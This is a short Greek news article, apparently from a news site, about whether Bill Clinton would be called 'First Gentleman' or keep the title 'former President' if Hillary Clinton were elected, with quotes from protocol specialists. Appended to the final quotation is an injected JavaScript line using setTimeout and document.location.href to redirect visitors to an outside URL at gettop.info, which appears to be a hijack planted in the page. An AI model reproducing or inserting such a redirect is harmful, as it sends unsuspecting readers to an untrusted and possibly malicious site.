Προβληματίζει ο τίτλος του Μπιλ Κλίντον αν εκλεγεί Πρόεδρος η Χίλαρι!

0
11

 

Η προσφώνηση «Πρώτος Κύριος» (First Gentleman) είναι η επικρατέστερη σύμφωνα με τους ειδήμονες, καθώς έτσι αποκαλούνται ανεπισήμως οι σύζυγοι έξι γυναικών κυβερνητών, σύμφωνα με τη Λίζα Γκροτς ειδική εδώ και 15 χρόνια σε θέματα τυπολογίας.

Ωστόσο, στην περίπτωση των Κλίντον η υπόθεση περιπλέκεται, καθώς ο 70χρονος Μπιλ Κλίντον διετέλεσε και πρόεδρος των ΗΠΑ από το 1993 έως το 2001. Όταν κάποιος έχει διατελέσει πρόεδρος, διατηρεί τον τίτλο, εξηγεί η Αλίντα Μπλακ της Ένωσης Ιστορικών του Λευκού Οίκου.

«Θα διατηρήσει τον τίτλο», τονίζει η ιστορικός. Σύμφωνα με το πρωτόκολλο, θα αποκαλούνται «η πρόεδρος Κλίντον και ο πρώην πρόεδρος Κλίντον».

«Το ίδιο έγινε με την οικογένεια Μπους», με τον Τζορτζ Ου. Μπους τον 43ο πρόεδρο των ΗΠΑ, και τον πατέρα του Τζορτζ, τον 41ο πρόεδρο. «Τότε είχαμε τον πρόεδρο Μπους και τον πρώην πρόεδρο Μπους, και όταν ήταν μαζί έτσι τους σύστηναν», πρόσθεσε η Μπλακ.

«Αν ήταν παντρεμένη με κάποιον που δεν έχει διατελέσει πρόεδρος, θα λάμβανε τον τίτλο του Πρώτου Κυρίου. Όμως ο Μπιλ Κλίντον είναι πρώην πρόεδρος και δεν μπορεί να αποκαλεστεί Πρώτος Κύριος, διότι είναι ένας κατώτερος τίτλος» από αυτόν του προέδρου», τόνισε η ίδια. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here